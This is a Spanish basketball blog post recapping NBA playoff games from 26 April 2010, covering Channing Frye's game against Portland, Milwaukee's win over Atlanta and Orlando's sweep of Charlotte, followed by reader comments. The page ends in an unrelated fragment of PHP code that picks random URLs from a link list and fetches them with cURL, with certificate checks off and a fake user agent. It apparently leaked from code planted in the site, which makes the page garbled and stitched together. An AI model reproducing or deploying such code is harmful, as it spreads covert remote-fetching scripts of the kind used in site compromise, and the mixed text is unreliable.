Playoffs 26/04/2010: En plato frío

27 de April de 2010 por TheDeerHunter

Channing Frye fue uno de esos jugadores bajo sospecha al servicio de los férreos sistemas McMillan. Un nº 8 del draft del 2005 que cuajó dos interesantes primeros años y fue fichado por el ojo clínico de Pritchard para apuntalar ese gran proyecto de futuro del que tanto se habla por aquellos lares. El técnico vio en él más defectos que virtudes y le asignó uno de esos roles específicos con alrededor de 15 minutos y escasas libertades disponibles para demostrar nada. Siempre sustituto y prácticamente incompatible con el interior estrella del equipo. Con tanta facilidad nos llegó a convencer a todos que se trata de un jugador que difícilmente podía resultar útil ante las inmensas exigencias físicas y defensivas de una competición de élite como la NBA. Y el jugador se marchitaba en el cada vez mayor ostracismo, perdiendo su autoconfianza día tras día y haciéndolo cada vez peor. Culpa suya, como nadie podía concebir de otra manera. Historia conocida.

La vida a veces ofrece revanchas inesperadas. La de Channing Frye culmina anoche ante la mirada atónita de McMillan que tampoco encontró la manera de frenarle. Fue el mejor de su equipo en una situación agobiantemente decisiva. Pero no sólo ofensivamente, en un perfil completamente antagónico al que ofrecía en Portland pero que ha sabido vislumbrar y explotar Gentry en su provecho, sinó también defensivamente. ¿Quizás queriendo agradecer a McMillan sus sesudas enseñanzas en ese sentido? No lo creo. El caso es que los Suns destrozaron a los Blazers con Frye y Dudley en cancha, con buenos minutos del ex de Portland junto a Stoudemire, como queriendo hacer referencia a lo que pudo haber sido junto a Aldridge. Una imagen casi cruel para los Blazers, ahora al borde de la eliminación.

Los Bucks ahora se toman su particular revancha, empatando la eliminatoria tras los dos primeros partidos en los que resultaron barridos. Lo hacen de repente mordiendo arriba, renunciando un poco a sus principios defensivos para alterar una dinámica que obviamente no les beneficiaba. Da la sensación de que han logrado sorprender a los Hawks, cuya defensa está haciendo aguas por todos lados. La audacia de Jennings bien arropada por el buen hacer de Salmons y Delfino ha obrado el milagro. La serie vuelve a empezar y los Hawks mentirían si hacen ver que no se sienten desconcertados.

Finalmente no ha habido opción en el Orlando vs Charlotte. Curiosamente Howard ha sido lo de menos en esta eliminatoria. Ha sido el buen hacer colectivo el que ha barrido a los Bobcats. Me viene a la cabeza si no sería la intención de Van Gundy el preparar al equipo para esta situación cuando, durante gran parte del curso, ha permitido a tanta gente lanzar a canasta más que al gran pívot de la liga. Los Bobcats no han logrado alterar el guión establecido. Tampoco se trata de un grupo excesivamente preparado para ello.

PREMIOS

MVP: Brandon Jennings ha recibido palos nuestros en varias ocasiones pero esta vez se merece cada uno de los elogios que le caigan. 23 puntos (9 de 16), 6 asistencias, 4 rebotes, 1 sola perdida. Lección de madurez en el momento justo.

Rookie: Nada que destacar a parte de Brandon Jennings.

Sorpresa: Channing Frye recordó que era eso de tirar cuando más falta le hacía a su equipo. Contribuyó a la victoria de los Suns con 20 puntos y 8 rebotes. Carlos Delfino también fue muy importante en la sorprendente victoria de los Bucks. 22 para él.

Decepción: Los Bobcats se han despedido de los Playoffs al más puro estilo Memphis Grizzlies. ¿Alguien espera verlos por aquí el año que viene?

Esfuerzo en vano: Ni Joe Johnson (29 puntos y 9 asistencias) ni Tyrus Thomas (21 puntos y 9 rebotes) vieron recompensados sus buenos partidos de anoche. Al menos el de los Hawks tendrá más oportunidades de redimirse.

Y MAÑANA…

Los Celtics intentarán por segunda vez finiquitar la eliminatoria frente los Heat. De nuevo, será si Wade quiere. En cambio, Spurs y Cavaliers se enfrentan a su primera oportunidad. Me sé de un GM bocazas que no dormirá aboslutamente nada esta noche. Y finalmente, en Los Angeles, un nuevo capítulo de la serie que enamora a todos por igual. ¿Qué Lakers veremos?

Comenta

59 comentarios a esta entrada

  1. LEmontus dice:
    #1

    jaaj no se como dejan que haga eso yo lo veo muy arriesgado y que bango se estrelle contra el aro en medio del partido hubiera sido tremendo.

    POR CIERTO AHORA QUE ME ACUERDO NO ME ECHARON ME FUI YÓ .xD jajajaj

      Citar

  2. Viva_Dirk dice:
    #2

    No, Lakers y Bulls no se parecen en nada, por mucho que tu digas cosas sin sentido. Phil Jackson de lo peorcito en entrenadores, eso si es un comentario coherente.

    Y te aconsejaría que no pusieses frases enteras en mayuscula en tus contestaciones.

      Citar

  3. TheDeerHunter dice:
    #3

    se les ve afectadísimos a los pobres

      Citar

  4. sergi237 dice:
    #4

    LEmontus ES DIOS

      Citar

  5. Txusma dice:
    #5

    Madrecita del amor hermoso! Pa’ haberse matado.

      Citar

  6. LEmontus dice:
    #6

    Sí insito son muy parecidos dos buenísimas plantillas sin control alguno , cada uno hace lo que quiere y son pocas las canatsas fáciles que meten.Eso es similitud.

    Phil es bastante malo ya no digo que gane elanillo(que iene equipo para ello) pero que jeugen a algo mira cavs orlando Hawks….

    ¿Por qué no pudo ultilizar mayúsculas?

      Citar

  7. sergi237 dice:
    #7

    ¿si te digo que tienes que pulsar mayús blog , la cosa canvia no ?

    1-LEmontus es DIOS

    2-Si no es mucho pedir alguien me podria dar información sobre el pase para poder ver partidos Nba ?

      Citar

  8. Viva_Dirk dice:
    #8

    Solo tienes que ver la de canastas fáciles que consiguieron en el 5º contra OKC, y los porcentajes de tiro que han tenido los equipos campeones que ha dirigido Phil.

    Las frases en mayuscula es en internet como gritar.

      Citar

  9. TheDeerHunter dice:
    #9

    Cuando Viva habla de los equipos campeones que ha dirigido Phil le hace falta apuntar que han sido 10 los equipos campeones que ha dirigido Phil, con 4 proyectos distintos y durante dos décadas diferentes.

    El resto de entrenadores tan sólo puede envidiar y aplaudir (y alguno de ellos vender a su padre, a su madre y a su abuela tan sólo por llegar a la suela de sus zapatos)

    Pero vamos… como el ganar es todo marketing, igual hay alguno que es el mejor del mundo porque lo diga el espíritu de las navidades pasadas o porque se le de mejor el encaje de bolillos

    Ah, y en los Lakers juegan cada uno a su aire… no hay más que ver dos partidos seguidos para darse cuenta de que ninguna jugada es igual que la anterior (y estando ciego, por supuesto)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>